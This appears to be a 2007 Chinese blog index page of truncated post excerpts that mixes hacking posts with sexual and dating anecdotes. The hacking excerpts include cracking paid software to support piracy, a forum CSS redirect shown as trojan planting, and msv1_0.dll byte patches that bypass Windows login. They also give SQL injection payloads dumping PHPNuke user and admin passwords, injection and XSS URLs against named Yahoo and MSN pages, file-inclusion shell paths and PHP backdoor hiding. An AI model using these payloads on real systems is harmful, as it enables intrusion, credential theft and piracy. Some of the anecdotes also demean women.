终于拿到了黑防的杂志，里面有一款“SQL格式化工具”，居然要花50RMB注册，虽然可以试用，但还是觉得很不爽，于是继续我的作风，支持盗版. 先查壳，Borland Delphi 6.0 – 7.0 编写。建议初学的话用Dede3.5 分析Delphi 程序。先看程序，随便输入KEY，就会提示说…

分析个下载者形式的木马 混世魔王 http://26836659.blogcn.com ASPack 2.12 -> Alexey Solodovnikov 0041E001 > 60 PUSHAD //入口代码 0041E002 E8 03000000 CALL randll32.0041E00A //F8到此 HR ESP F9运行 0041E007 – E9 EB045D45 JMP 459EE4F7 0041E00C 5…

本篇开宗明义“有花堪折直须折，莫待无花空折枝”。话说某年某月某日。你一觉醒来，突然发现自己年近三十还是孤身一人，长这么大连女孩的手都没摸过，你忍不住黯然神伤悲从中来泪如雨下痛不欲生，自此暗暗下定决心，从现在起最主要的任务是 【泡妞】 初涉情海…

在个乡下躲了一个月,现在回家….汽车在回去的路上路过了洪水…..区….. 看着路边的房屋…..那是楼顶……..[img]http://images.blogcn.com/2007/8/24/5/26836659,s_20070824174248502.JPG[/img].那是楼顶……..[img]http://images.blogcn.com//2007/8/24/5/26836659,2…

入侵某网游服务器小记. 没什么技术性,只是想说明现状 现在想弄钱的入侵者，似乎热衷于入侵网络游戏服务器，盗出游戏服务器程序或是数据库。国内的网络游戏企业，都应该招受过此损失，有暴露出来的，有没暴露出来的。但游戏企业对安全问题理解都十分片面，狭…

DZ5.5 论坛挂马.[code][float=expression(window.location=”26836659.blogcn.com”)]混世魔王友情检测[/float][/code] sql injection bug in PhpBB 2.0.8 and in older versions[code]http://marc.info/?l=bugtraq&m=108032454818873&w=2[/code]

ystem32下 有个msv1_0.dll xp sp2F8 10 75 11 B0 01 8B 4D修改为E0 00 75 11 B0 01 8B 4D 2k professinalF8 10 0F 84 71 FF FF修改为E0 00 0F 84 71 FF FF 2k sp4F8 10 75 11 b0 01 8b 4D修改为E0 00 75 11 b0 01 8b 4D 2003 sp1F8 10 0F 84 D0 B8 FF FF修改…

一、QQ聊天是一项复杂的系统工程，刚学会聊天的男人，总以为网上的女人都是性狂，聊一个上一个，其实不然。其实网络只是现实世界的一部分，和中国的现实社会一样，对大多数女网民来讲，思想还是保守的，一下子勾上的可能性并不大。所以网络聊天首先要有失败…

尽管利用Google作为黑客工具已经不是什么秘密，但这一问题似乎并未引起大家的足够重视， 而有些介绍Google黑客的文章又过于笼统，未能使大家了解到黑客是如何利用Google这一工具的， 因此，无法采取有效的方法防范。本文试图为大家初步揭露Google黑客的神秘…

我在网吧里把到的一位漂亮女孩[1] 最近一段日子，我玩《魔兽争霸》挺火的，除了上班、吃饭、睡觉外，几乎所有的时间都花在了游戏上。我和猛男喜欢在浩方 上打，那里高手如云，我最善长用人族的英雄，而他是对精灵族有专攻。 我记得那是一个周六的晚上，我和…

[Exploit]PHPNuke 所有版本 EnhancedSearch 文件存在主入漏洞 SQL Injection : EnhancedSearch%’) UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* EnhancedSearch%’) UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_aut…

漏洞页[code]http://support.msn.com/networkstatus.aspx? http://support.msn.com/default.aspx? http://feedback.msn.com/default.aspx? http://feedback.msn.com/eform.aspx?http://support.msn.com/networkstatus.aspx?[/code] 代码[code]mkt=tr”;></noscript>[scri…

PHP后门的隐藏技巧测试报告 最近有人问我是否能把我那一句话木马隐藏到HTML或图片里，其实把一句话木马插入到PHP文件中就已经很隐蔽了，如果说硬是要放到HTML文件或图片里，就接着往下看这篇的篇测试报告吧。要知道如果光把PHP语句放到图片里是无论如何也不…

女人不骚男人难道就不爱了吗 文/醉鬼 这话是我同事刚才和我吃饭的时候说的，笑得我不知道是怎么忍住的，真是佩服这家伙居然能说出这样的话来，让我有点一下子看不懂了。这是一个平时很斯文的男人，不像我一遇到不顺心的事情就会破口大骂，于是我就问他你哪里…

偶然看一位自称是良家妇女的女人发表的贴子，基中描诉了她的N次一夜情，大多是她不远千里的去到男网友的城市，然后约出男网友来偷欢。这位“良家妇女”声称婚外情是自然而然的事，当两个互相有好感的成年男女，上床是很正常的事，在津津自喜的说着那些男网友对…

贪官，妓女都比你强 如今这世道，贪官有多少，谁也说不清楚，只是从新闻里得知，去年中纪委查处了不少，连省部级的都好几个，官员不论职务高低都是国家公务员，都是人民的公仆，你手中的权利是人民给你地，既然给了你权利你就应该为人民办事，可是你呢？拿了…

刚才迪吧里回来，写一写发生在迪吧里真实的故事。可能不是太刺激，不过很真实 我平常很少去这种地方，主要是年纪也不小了，不太适合我们了。今天和同事喝了一点小酒，于是趁着酒兴，就找了一家迪吧玩一玩。 一进去，就被轰天的DJ给震得春心荡漾啊。只是舞池…

昨天开个房，给前女友打电话，她不肯来，我只好一个人住。晚上九点出去洗个澡，回来十点，我脚步声咚咚上楼，就感觉异样，什么声音在四周被压抑着。开门，关门，打开电视，是个谈话节目，正看着，隐约发觉一种猫叫一样的声音幽幽细细在缭绕，心啵地一跳，悬…

包含漏洞收集..包你爽歪歪. PHP Attacker PHP Remote File Injecter v1.0 [img]http://images.blogcn.com/2007/4/14/11/26836659,20070414205116.jpg[/img] [code] index2.php?includes_dir=Shell forums/toplist.php?phpbb_root_path=Shell forum/toplist.p…

Battle.net clan管理系统使用MySQL后端，允许用户方便的升级和维护web站点。 系统实现上存在输入验证漏洞，远程攻击者可能利用此漏洞执行SQL注入攻击，非授权获取系统的管理权限。 Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输…

小百姓包二奶技术手册注意：本人手册非鼓励男人包二奶,只是借此说明这种现象，请勿对号入座 我认识不少香港台湾的朋友，大多曾经在上海北京广东一代包过二奶，也很愿意与我分享经验。大家首先要在包之前厘定关系，玩的只能是玩的，认真的就是认真的，千万不…

找到一个 Yahoo 主入漏洞,真JB兴奋. [code] http://widgets.yahoo.com/gallery/view.php?widget=39352/**/and/**/1=2/**/union/**/select/**/version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15 [/code] 居然yahoo也是用mysql数据库。4.0 user :gallery@68.142.19…

w3wp remote DoS due to improper reference of STA COM components in ASP.NET asp.net COM 的 DOS EXP 研究 牛文下载地址.以及EXP [quote] http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip [/quote] 文章提到漏洞挖掘工具 fiddler 可以到 fiddler…